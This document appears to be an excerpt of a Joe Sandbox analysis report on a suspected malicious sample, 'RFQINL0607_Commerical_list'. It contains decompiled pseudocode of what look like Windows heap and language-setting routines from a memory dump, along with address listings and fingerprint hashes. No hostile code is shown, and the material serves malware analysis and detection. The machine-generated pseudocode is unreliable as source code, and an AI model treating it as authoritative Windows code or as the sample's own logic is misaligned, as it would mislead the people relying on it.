												_t82 = _t28;
												_v1096 = _t82;
												if(_t82 != 0) {
													_t66 = _t90;
													_v1084 = _t90;
													do {
														_t86 =  *((intOrPtr*)(_t95 + 0x310 + _t66 * 4));
														_t67 = E33397AD0(_t82, _t86, _t79);
														_t95 = _t95 + 0xc;
														if(_t67 != 0) {
															_t79 = _v1092;
															goto L23;
														} else {
															_t34 = _t86 + 2; // 0x3332708e
															_t80 = _t34;
															do {
																_t69 =  *_t86;
																_t86 = _t86 + 2;
															} while (_t69 != _t90);
															_t79 = _v1092;
															if(_v1092 == _t86 - _t80 >> 1) {
																goto L26;
															} else {
																goto L23;
															}
														}
														goto L27;
														L23:
														_t82 = _v1096;
														_t66 = _v1084 + 1;
														_v1084 = _t66;
													} while (_t66 < 6);
												}
												goto L24;
											}
										} else {
											_t79 = _t79 + 1;
											_t59 = _t59 - 2;
											continue;
										}
										goto L27;
									}
									goto L24;
								}
							}
						} else {
							_push(_t90);
							_push( &_v1092);
							_push( &_v1076);
							_t81 = 0xfffffffc;
							if(E33384F11(_t81) < 0 || (_v1092 & 0x00008000) == 0) {
								goto L26;
							} else {
							}
						}
					} else {
						_t74 = E33397AD0( &_v300, L"SegmentHeap", 0xf);
						_t95 = _t95 + 0xc;
						if(_t74 == 0) {
							goto L26;
						} else {
							goto L3;
						}
					}
				}
				L27:
				_pop(_t85);
				_pop(_t92);
				return E33394B50(_t90, _t75, _v8 ^ _t95, _t82, _t85, _t92);
			}




































                                                                                                                                                                                  0x333f86c2
                                                                                                                                                                                  0x333f86c2
                                                                                                                                                                                  0x333f86ca
                                                                                                                                                                                  0x333f86d7
                                                                                                                                                                                  0x333f86e6
                                                                                                                                                                                  0x333f86e8
                                                                                                                                                                                  0x333f86f3
                                                                                                                                                                                  0x333f86fe
                                                                                                                                                                                  0x333f8700
                                                                                                                                                                                  0x333f870b
                                                                                                                                                                                  0x333f8716
                                                                                                                                                                                  0x333f8721
                                                                                                                                                                                  0x333f872c
                                                                                                                                                                                  0x333f873a
                                                                                                                                                                                  0x333f8892
                                                                                                                                                                                  0x333f8892
                                                                                                                                                                                  0x333f889a
                                                                                                                                                                                  0x333f8740
                                                                                                                                                                                  0x333f875e
                                                                                                                                                                                  0x333f877f
                                                                                                                                                                                  0x333f877f
                                                                                                                                                                                  0x333f8787
                                                                                                                                                                                  0x333f87c0
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f87c6
                                                                                                                                                                                  0x333f87c8
                                                                                                                                                                                  0x333f87d1
                                                                                                                                                                                  0x333f87d3
                                                                                                                                                                                  0x333f87d9
                                                                                                                                                                                  0x333f87e8
                                                                                                                                                                                  0x333f87e8
                                                                                                                                                                                  0x333f87ee
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f87e2
                                                                                                                                                                                  0x333f87f4
                                                                                                                                                                                  0x333f884f
                                                                                                                                                                                  0x333f8853
                                                                                                                                                                                  0x333f8875
                                                                                                                                                                                  0x333f8886
                                                                                                                                                                                  0x333f888b
                                                                                                                                                                                  0x333f8890
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f8890
                                                                                                                                                                                  0x333f87f6
                                                                                                                                                                                  0x333f87f6
                                                                                                                                                                                  0x333f87f6
                                                                                                                                                                                  0x333f87f9
                                                                                                                                                                                  0x333f87ff
                                                                                                                                                                                  0x333f8801
                                                                                                                                                                                  0x333f8803
                                                                                                                                                                                  0x333f8807
                                                                                                                                                                                  0x333f8807
                                                                                                                                                                                  0x333f8811
                                                                                                                                                                                  0x333f8816
                                                                                                                                                                                  0x333f881b
                                                                                                                                                                                  0x333f8839
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f881d
                                                                                                                                                                                  0x333f881d
                                                                                                                                                                                  0x333f881d
                                                                                                                                                                                  0x333f8820
                                                                                                                                                                                  0x333f8820
                                                                                                                                                                                  0x333f8823
                                                                                                                                                                                  0x333f8826
                                                                                                                                                                                  0x333f882d
                                                                                                                                                                                  0x333f8835
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f8837
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f8837
                                                                                                                                                                                  0x333f8835
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f883d
                                                                                                                                                                                  0x333f8841
                                                                                                                                                                                  0x333f8845
                                                                                                                                                                                  0x333f8846
                                                                                                                                                                                  0x333f884a
                                                                                                                                                                                  0x333f8807
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f87ff
                                                                                                                                                                                  0x333f87e4
                                                                                                                                                                                  0x333f87e4
                                                                                                                                                                                  0x333f87e5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f87e5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f87e2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f87f0
                                                                                                                                                                                  0x333f87c8
                                                                                                                                                                                  0x333f8789
                                                                                                                                                                                  0x333f8789
                                                                                                                                                                                  0x333f878e
                                                                                                                                                                                  0x333f8793
                                                                                                                                                                                  0x333f8796
                                                                                                                                                                                  0x333f879e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f87b2
                                                                                                                                                                                  0x333f879e
                                                                                                                                                                                  0x333f8760
                                                                                                                                                                                  0x333f876f
                                                                                                                                                                                  0x333f8774
                                                                                                                                                                                  0x333f8779
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333f8779
                                                                                                                                                                                  0x333f875e
                                                                                                                                                                                  0x333f889b
                                                                                                                                                                                  0x333f88a4
                                                                                                                                                                                  0x333f88a5
                                                                                                                                                                                  0x333f88b0

                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                  • API String ID: 0-2515994595
                                                                                                                                                                                  • Opcode ID: fb67e8607c9e06697c704848c1f8ef281ac6397b0e453306f3844bbbc3cde088
                                                                                                                                                                                  • Instruction ID: e02e61ac1b68debfac386170cab161c611c97b7cae0ad823daa8b465287b3416
                                                                                                                                                                                  • Opcode Fuzzy Hash: fb67e8607c9e06697c704848c1f8ef281ac6397b0e453306f3844bbbc3cde088
                                                                                                                                                                                  • Instruction Fuzzy Hash: F4518CB59043119BE319CF14CC40B9BBBECFB84651F84C92DF998CA241E731D659CB92
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 333FF0A5 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                                                                  			E333FF0A5(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t87;
				signed int _t89;
				signed int _t92;
				intOrPtr _t93;
				intOrPtr _t94;
				signed char _t105;
				signed int _t106;
				intOrPtr _t108;
				signed int _t109;
				signed int _t110;
				intOrPtr _t112;
				intOrPtr _t116;
				short* _t134;
				short _t135;
				signed char _t153;
				signed int* _t158;
				short* _t169;
				signed int _t174;
				signed int _t184;
				signed int _t185;
				intOrPtr* _t190;
				void* _t191;

				_push(0x3c);
				_push(0x3342d320);
				E333A7BE4(__ebx, __edi, __esi);
				_t188 = __ecx;
				 *((intOrPtr*)(_t191 - 0x3c)) = __ecx;
				 *((char*)(_t191 - 0x19)) = 0;
				 *(_t191 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *(_t191 - 4) = 0;
					 *(_t191 - 4) = 1;
					_t87 = E33347662("RtlAllocateHeap");
					__eflags = _t87;
					if(_t87 == 0) {
						L46:
						 *(_t191 - 0x24) = 0;
						L47:
						 *(_t191 - 4) = 0;
						 *(_t191 - 4) = 0xfffffffe;
						E333FF3F9();
						_t89 =  *(_t191 - 0x24);
						goto L48;
					}
					_t153 =  *(__ecx + 0x44) | __edx;
					 *(_t191 - 0x2c) = _t153;
					_t183 = _t153 | 0x10000100;
					 *(_t191 - 0x34) = _t153 | 0x10000100;
					_t174 =  *(_t191 + 8);
					__eflags = _t174;
					 *(_t191 - 0x20) = _t174;
					if(_t174 == 0) {
						 *(_t191 - 0x20) = 1;
					}
					_t92 =  *((intOrPtr*)(_t188 + 0x94)) +  *(_t191 - 0x20) &  *(_t188 + 0x98);
					__eflags = _t92 - 0x10;
					if(_t92 < 0x10) {
						_t92 = 0x10;
					}
					_t93 = _t92 + 8;
					 *((intOrPtr*)(_t191 - 0x40)) = _t93;
					__eflags = _t93 - _t174;
					if(_t93 < _t174) {
						L42:
						_t94 =  *[fs:0x30];
						__eflags =  *(_t94 + 0xc);
						if( *(_t94 + 0xc) == 0) {
							_push("HEAP: ");
							E3334B910();
						} else {
							E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t188 + 0x78)));
						E3334B910("Invalid allocation size - %Ix (exceeded %Ix)\n",  *(_t191 + 8));
						goto L46;
					} else {
						__eflags = _t93 -  *((intOrPtr*)(_t188 + 0x78));
						if(_t93 >  *((intOrPtr*)(_t188 + 0x78))) {
							goto L42;
						}
						__eflags = _t153 & 0x00000001;
						if((_t153 & 0x00000001) == 0) {
							E3335FED0( *((intOrPtr*)(_t188 + 0xc8)));
							 *((char*)(_t191 - 0x19)) = 1;
							_t183 =  *(_t191 - 0x2c) | 0x10000101;
							__eflags = _t183;
							 *(_t191 - 0x34) = _t183;
						}
						E33400835(_t188, 0);
						_t184 = L33365D90(_t188, _t188, _t183,  *(_t191 + 8));
						 *(_t191 - 0x24) = _t184;
						_t176 = 1;
						E33400D24(_t188);
						__eflags = _t184;
						if(_t184 == 0) {
							goto L47;
						} else {
							_t185 = _t184 + 0xfffffff8;
							__eflags =  *((char*)(_t185 + 7)) - 5;
							if( *((char*)(_t185 + 7)) == 5) {
								_t185 = _t185 - (( *(_t185 + 6) & 0x000000ff) << 3);
								__eflags = _t185;
							}
							_t158 = _t185;
							 *(_t191 - 0x38) = _t185;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *(_t185 + 3) - (_t158[0] ^ _t158[0] ^  *_t158);
								if(__eflags != 0) {
									_push(_t158);
									_t176 = _t185;
									E3340D646(0, _t188, _t185, _t185, _t188, __eflags);
								}
							}
							__eflags =  *(_t185 + 2) & 0x00000002;
							if(( *(_t185 + 2) & 0x00000002) == 0) {
								_t105 =  *(_t185 + 3);
								 *(_t191 - 0x1a) = _t105;
								_t106 = _t105 & 0x000000ff;
							} else {
								_t134 = E33383AE9(_t185);
								 *((intOrPtr*)(_t191 - 0x28)) = _t134;
								__eflags =  *(_t188 + 0x40) & 0x08000000;
								if(( *(_t188 + 0x40) & 0x08000000) == 0) {
									 *_t134 = 0;
								} else {
									_t135 = L3337FDB9(1, _t176);
									_t169 =  *((intOrPtr*)(_t191 - 0x28));
									 *_t169 = _t135;
									_t134 = _t169;
								}
								_t45 = _t134 + 2; // 0xffff
								_t106 =  *_t45 & 0x0000ffff;
							}
							 *(_t191 - 0x2c) = _t106;
							 *(_t191 - 0x20) = _t106;
							__eflags =  *(_t188 + 0x4c);
							if( *(_t188 + 0x4c) != 0) {
								 *(_t185 + 3) =  *(_t185 + 2) ^  *(_t185 + 1) ^  *_t185;
								 *_t185 =  *_t185 ^  *(_t188 + 0x50);
								__eflags =  *_t185;
							}
							__eflags =  *(_t188 + 0x40) & 0x20000000;
							if(( *(_t188 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E33400835(_t188, 0);
							}
							__eflags =  *(_t191 - 0x24) -  *0x334447c0; // 0x0
							_t108 =  *[fs:0x30];
							if(__eflags != 0) {
								_t109 =  *(_t108 + 0x68);
								 *(_t191 - 0x44) = _t109;
								__eflags = _t109 & 0x00000800;
								if((_t109 & 0x00000800) == 0) {
									goto L47;
								}
								_t110 =  *(_t191 - 0x2c);
								__eflags = _t110;
								if(_t110 == 0) {
									goto L47;
								}
								__eflags = _t110 -  *0x334447c4; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								__eflags =  *((intOrPtr*)(_t188 + 0x7c)) -  *0x334447c6; // 0x0
								if(__eflags != 0) {
									goto L47;
								}
								_t112 =  *[fs:0x30];
								__eflags =  *(_t112 + 0xc);
								if( *(_t112 + 0xc) == 0) {
									_push("HEAP: ");
									E3334B910();
								} else {
									E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E333F823A(_t188,  *(_t191 - 0x20)));
								_push( *(_t191 + 8));
								E3334B910("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t191 - 0x24));
								goto L32;
							} else {
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E3334B910();
								} else {
									E3334B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t191 + 8));
								E3334B910("Just allocated block at %p for %Ix bytes\n",  *0x334447c0);
								L32:
								_t116 =  *[fs:0x30];
								__eflags =  *((char*)(_t116 + 2));
								if( *((char*)(_t116 + 2)) != 0) {
									 *0x334447a1 = 1;
									 *0x33444100 = 0;
									asm("int3");
									 *0x334447a1 = 0;
								}
								goto L47;
							}
						}
					}
				} else {
					_t190 =  *0x33443748; // 0x0
					 *0x334491e0(__ecx, __edx,  *(_t191 + 8));
					_t89 =  *_t190();
					L48:
					 *[fs:0x0] =  *((intOrPtr*)(_t191 - 0x10));
					return _t89;
				}
			}

























                                                                                                                                                                                  0x333ff0a5
                                                                                                                                                                                  0x333ff0a7
                                                                                                                                                                                  0x333ff0ac
                                                                                                                                                                                  0x333ff0b3
                                                                                                                                                                                  0x333ff0b5
                                                                                                                                                                                  0x333ff0ba
                                                                                                                                                                                  0x333ff0bd
                                                                                                                                                                                  0x333ff0c7
                                                                                                                                                                                  0x333ff0e3
                                                                                                                                                                                  0x333ff0e6
                                                                                                                                                                                  0x333ff0f4
                                                                                                                                                                                  0x333ff0f9
                                                                                                                                                                                  0x333ff0fb
                                                                                                                                                                                  0x333ff3d2
                                                                                                                                                                                  0x333ff3d2
                                                                                                                                                                                  0x333ff3d5
                                                                                                                                                                                  0x333ff3d5
                                                                                                                                                                                  0x333ff3d8
                                                                                                                                                                                  0x333ff3df
                                                                                                                                                                                  0x333ff3e4
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ff3e4
                                                                                                                                                                                  0x333ff104
                                                                                                                                                                                  0x333ff106
                                                                                                                                                                                  0x333ff10b
                                                                                                                                                                                  0x333ff111
                                                                                                                                                                                  0x333ff114
                                                                                                                                                                                  0x333ff117
                                                                                                                                                                                  0x333ff119
                                                                                                                                                                                  0x333ff11c
                                                                                                                                                                                  0x333ff11e
                                                                                                                                                                                  0x333ff11e
                                                                                                                                                                                  0x333ff12e
                                                                                                                                                                                  0x333ff134
                                                                                                                                                                                  0x333ff137
                                                                                                                                                                                  0x333ff13b
                                                                                                                                                                                  0x333ff13b
                                                                                                                                                                                  0x333ff13c
                                                                                                                                                                                  0x333ff13f
                                                                                                                                                                                  0x333ff142
                                                                                                                                                                                  0x333ff144
                                                                                                                                                                                  0x333ff350
                                                                                                                                                                                  0x333ff350
                                                                                                                                                                                  0x333ff356
                                                                                                                                                                                  0x333ff359
                                                                                                                                                                                  0x333ff378
                                                                                                                                                                                  0x333ff37d
                                                                                                                                                                                  0x333ff35b
                                                                                                                                                                                  0x333ff370
                                                                                                                                                                                  0x333ff375
                                                                                                                                                                                  0x333ff383
                                                                                                                                                                                  0x333ff38e
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ff14a
                                                                                                                                                                                  0x333ff14a
                                                                                                                                                                                  0x333ff14d
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ff153
                                                                                                                                                                                  0x333ff156
                                                                                                                                                                                  0x333ff15e
                                                                                                                                                                                  0x333ff163
                                                                                                                                                                                  0x333ff16a
                                                                                                                                                                                  0x333ff16a
                                                                                                                                                                                  0x333ff170
                                                                                                                                                                                  0x333ff170
                                                                                                                                                                                  0x333ff177
                                                                                                                                                                                  0x333ff186
                                                                                                                                                                                  0x333ff188
                                                                                                                                                                                  0x333ff18b
                                                                                                                                                                                  0x333ff18f
                                                                                                                                                                                  0x333ff194
                                                                                                                                                                                  0x333ff196
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ff19c
                                                                                                                                                                                  0x333ff19c
                                                                                                                                                                                  0x333ff19f
                                                                                                                                                                                  0x333ff1a3
                                                                                                                                                                                  0x333ff1ac
                                                                                                                                                                                  0x333ff1ac
                                                                                                                                                                                  0x333ff1ac
                                                                                                                                                                                  0x333ff1ae
                                                                                                                                                                                  0x333ff1b0
                                                                                                                                                                                  0x333ff1b3
                                                                                                                                                                                  0x333ff1b6
                                                                                                                                                                                  0x333ff1bb
                                                                                                                                                                                  0x333ff1c5
                                                                                                                                                                                  0x333ff1c8
                                                                                                                                                                                  0x333ff1ca
                                                                                                                                                                                  0x333ff1cb
                                                                                                                                                                                  0x333ff1cf
                                                                                                                                                                                  0x333ff1cf
                                                                                                                                                                                  0x333ff1c8
                                                                                                                                                                                  0x333ff1d4
                                                                                                                                                                                  0x333ff1d8
                                                                                                                                                                                  0x333ff208
                                                                                                                                                                                  0x333ff20b
                                                                                                                                                                                  0x333ff20e
                                                                                                                                                                                  0x333ff1da
                                                                                                                                                                                  0x333ff1dc
                                                                                                                                                                                  0x333ff1e1
                                                                                                                                                                                  0x333ff1e6
                                                                                                                                                                                  0x333ff1ed
                                                                                                                                                                                  0x333ff1ff
                                                                                                                                                                                  0x333ff1ef
                                                                                                                                                                                  0x333ff1f0
                                                                                                                                                                                  0x333ff1f5
                                                                                                                                                                                  0x333ff1f8
                                                                                                                                                                                  0x333ff1fb
                                                                                                                                                                                  0x333ff1fb
                                                                                                                                                                                  0x333ff202
                                                                                                                                                                                  0x333ff202
                                                                                                                                                                                  0x333ff202
                                                                                                                                                                                  0x333ff211
                                                                                                                                                                                  0x333ff214
                                                                                                                                                                                  0x333ff218
                                                                                                                                                                                  0x333ff21b
                                                                                                                                                                                  0x333ff227
                                                                                                                                                                                  0x333ff22d
                                                                                                                                                                                  0x333ff22d
                                                                                                                                                                                  0x333ff22d
                                                                                                                                                                                  0x333ff22f
                                                                                                                                                                                  0x333ff236
                                                                                                                                                                                  0x333ff238
                                                                                                                                                                                  0x333ff23c
                                                                                                                                                                                  0x333ff23c
                                                                                                                                                                                  0x333ff244
                                                                                                                                                                                  0x333ff24a
                                                                                                                                                                                  0x333ff250
                                                                                                                                                                                  0x333ff2be
                                                                                                                                                                                  0x333ff2c1
                                                                                                                                                                                  0x333ff2c4
                                                                                                                                                                                  0x333ff2c9
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ff2cf
                                                                                                                                                                                  0x333ff2d2
                                                                                                                                                                                  0x333ff2d5
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ff2db
                                                                                                                                                                                  0x333ff2e2
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ff2ec
                                                                                                                                                                                  0x333ff2f3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ff2f9
                                                                                                                                                                                  0x333ff2ff
                                                                                                                                                                                  0x333ff302
                                                                                                                                                                                  0x333ff321
                                                                                                                                                                                  0x333ff326
                                                                                                                                                                                  0x333ff304
                                                                                                                                                                                  0x333ff319
                                                                                                                                                                                  0x333ff31e
                                                                                                                                                                                  0x333ff337
                                                                                                                                                                                  0x333ff338
                                                                                                                                                                                  0x333ff343
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ff252
                                                                                                                                                                                  0x333ff252
                                                                                                                                                                                  0x333ff255
                                                                                                                                                                                  0x333ff274
                                                                                                                                                                                  0x333ff279
                                                                                                                                                                                  0x333ff257
                                                                                                                                                                                  0x333ff26c
                                                                                                                                                                                  0x333ff271
                                                                                                                                                                                  0x333ff27f
                                                                                                                                                                                  0x333ff28d
                                                                                                                                                                                  0x333ff295
                                                                                                                                                                                  0x333ff295
                                                                                                                                                                                  0x333ff29b
                                                                                                                                                                                  0x333ff29f
                                                                                                                                                                                  0x333ff2a5
                                                                                                                                                                                  0x333ff2ac
                                                                                                                                                                                  0x333ff2b2
                                                                                                                                                                                  0x333ff2b3
                                                                                                                                                                                  0x333ff2b3
                                                                                                                                                                                  0x00000000
                                                                                                                                                                                  0x333ff29f
                                                                                                                                                                                  0x333ff250
                                                                                                                                                                                  0x333ff196
                                                                                                                                                                                  0x333ff0c9
                                                                                                                                                                                  0x333ff0ce
                                                                                                                                                                                  0x333ff0d6
                                                                                                                                                                                  0x333ff0dc
                                                                                                                                                                                  0x333ff3e7
                                                                                                                                                                                  0x333ff3ea
                                                                                                                                                                                  0x333ff3f6
                                                                                                                                                                                  0x333ff3f6

                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.11643698870.0000000033320000.00000040.00001000.00020000.00000000.sdmp, Offset: 33320000, based on PE: true
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.0000000033449000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  • Associated: 00000002.00000002.11643698870.000000003344D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_33320000_RFQINL0607_Commerical_list.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: DebugPrintTimes
                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                                                                                  • API String ID: 3446177414-1745908468
                                                                                                                                                                                  • Opcode ID: 958546969307f51784e0bc3a0c6603c11eff4b34ade4c875d27f673a71bb4594
                                                                                                                                                                                  • Instruction ID: 427674e85791a98b90ad344eace9e2a3152906343a47a522024ad4d379b4bc03
                                                                                                                                                                                  • Opcode Fuzzy Hash: 958546969307f51784e0bc3a0c6603c11eff4b34ade4c875d27f673a71bb4594
                                                                                                                                                                                  • Instruction Fuzzy Hash: BC91F439900745EFEB01DFA4C880A9DBBF1FF49710F98C25AE885AB651CB76D941CB14
                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                  Function 3334D02D Relevance: 11.5, Strings: 9, Instructions: 249COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                                  			E3334D02D(void* __ecx, intOrPtr* __edx, intOrPtr _a4) {
				char* _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char* _v124;
				signed int _v128;
				char _v132;
				char _v140;
				signed int _v144;
				char _v145;
				char _v148;
				signed int _v152;
				void* _v156;
				void* _v157;
				signed int _v160;
				void* _v161;
				signed int _v164;
				signed int _v168;
				void* _v172;
				void* _v180;
				void* _v188;
				intOrPtr _t111;
				void* _t128;
				void* _t160;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr* _t179;
				void* _t182;
				char _t184;
				signed int _t185;
				void* _t187;
				void* _t196;

				_t187 = (_t185 & 0xfffffff8) - 0x9c;
				_t160 = __ecx;
				_t179 = __edx;
				_v128 = 0;
				_v160 = 0;
				_v144 = 0;
				_v152 = 0;
				if(__edx == 0 || _a4 == 0) {
					_t182 = 0xc000000d;
					goto L11;
				} else {
					_v128 =  *__edx;
					E33395050(__ecx,  &_v140, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
					_t184 = 0x18;
					_v132 = _t184;
					_v124 =  &_v148;
					_v128 = 0;
					_push( &_v132);
					_push(0x20019);
					_v120 = 0x40;
					_push( &_v168);
					_v116 = 0;
					_v112 = 0;
					if(E33392AB0() >= 0) {
						_t182 = L3340ADD6(_v160, _a4,  &_v145,  &_v132);
						if(_t182 >= 0) {
							L11:
							if(_v160 != 0) {
								_push(_v160);
								E33392A80();
							}
							if(_v144 != 0) {
								_push(_v144);
								E33392A80();
							}
							if(_v152 != 0) {
								_push(_v152);
								E33392A80();
							}
							if(_t182 < 0) {
								if(_t179 == 0) {
									goto L19;
								}
								_t162 = _v128;
								if( *_t179 == _t162) {
									goto L19;
								}
								if( *_t179 != 0) {
									E33363BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t179);
								}
								goto L44;
							} else {
								if( *_t179 != 0) {
									L19:
									return _t182;
								}
								_t111 = E3334DAA8(1);
								 *_t179 = _t111;
								if(_t111 == 0) {
									_t162 = _v128;
									_t182 = 0xc0000017;
									L44:
									 *_t179 = _t162;
								}
								goto L19;
							}
						}
						if(_t160 == 8) {
							 *((char*)(_t187 + 0x13)) = 0;
							if(E3340AD61(_v160, _t187 + 0x13) == 0 &&  *((char*)(_t187 + 0x13)) == 1) {
								_t160 = 4;
							}
						}
						_push(_v160);
						E33392A80();
						_v164 = _v164 & 0x00000000;
						_t184 = 0x18;
					}
					_t170 = 0x2000000;
					if(E3334D736(0x2000000,  &_v152) < 0) {
						_v152 = _v152 & 0x00000000;
					}
					if(_t160 != 8) {
						if(_t160 != 4) {
							goto L25;
						}
						if(_v152 == 0) {
							_t128 = 0xc0000034;
						} else {
							E33395050(_t170,  &_v140, L"Control Panel\\Desktop\\MuiCached\\MachineLanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v44 = _v44 & 0x00000000;
							_v40 = _v40 & 0x00000000;
							_v56 = _v160;
							_v52 =  &_v148;
							_push( &_v60);
							_push(0x20019);
							_v60 = _t184;
							_push( &_v168);
							_v48 = 0x40;
							_t128 = E33392AB0();
						}
						if(_t128 < 0) {
							E33395050(_t170,  &_v140, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings\\LanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v32 = _v32 & 0x00000000;
							 *(_t187 + 0xa0) =  *(_t187 + 0xa0) & 0x00000000;
							 *(_t187 + 0xa4) =  *(_t187 + 0xa4) & 0x00000000;
							_v28 =  &_v148;
							_push( &_v36);
							_push(0x20019);
							_v36 = _t184;
							_push( &_v168);
							 *((intOrPtr*)(_t187 + 0xa8)) = 0x40;
							_t182 = E33392AB0();
							if(_t182 < 0) {
								goto L9;
							}
						}
						goto L25;
					} else {
						if(_v152 == 0) {
							L10:
							_t182 = 0;
							goto L11;
						}
						E33395050(_t170,  &_v140, L"Software\\Policies\\Microsoft\\Control Panel\\Desktop");
						_v92 = _v92 & 0x00000000;
						_v88 = _v88 & 0x00000000;
						_v104 = _v160;
						_t164 = 0x40;
						_v100 =  &_v148;
						_push( &_v108);
						_push(0x20019);
						_v108 = _t184;
						_push( &_v152);
						_v96 = _t164;
						if(E33392AB0() >= 0) {
							_t170 = _v144;
							_t182 = L3340ADD6(_v144, _a4,  &_v145,  &_v132);
							if(_t182 >= 0) {
								goto L11;
							}
							_t184 = 0x18;
						}
						E33395050(_t170,  &_v140, L"Control Panel\\Desktop\\LanguageConfiguration");
						_v168 = _v168 & 0x00000000;
						_v68 = _v68 & 0x00000000;
						_v64 = _v64 & 0x00000000;
						 *((intOrPtr*)(_t187 + 0x64)) = _v160;
						 *((intOrPtr*)(_t187 + 0x68)) =  &_v148;
						_push( &_v84);
						_push(0x20019);
						_v84 = _t184;
						_push( &_v168);
						_v72 = _t164;
						_t182 = E33392AB0();
						if(_t182 >= 0) {
							L25:
							_t182 = E3334D9A2(_v160, _t179, _a4);
							goto L11;
						} else {
							_t196 = _t182 - 0xc0000034;
							L9:
							if(_t196 != 0) {
								goto L11;
							}
							goto L10;
						}
					}
				}
			}





















































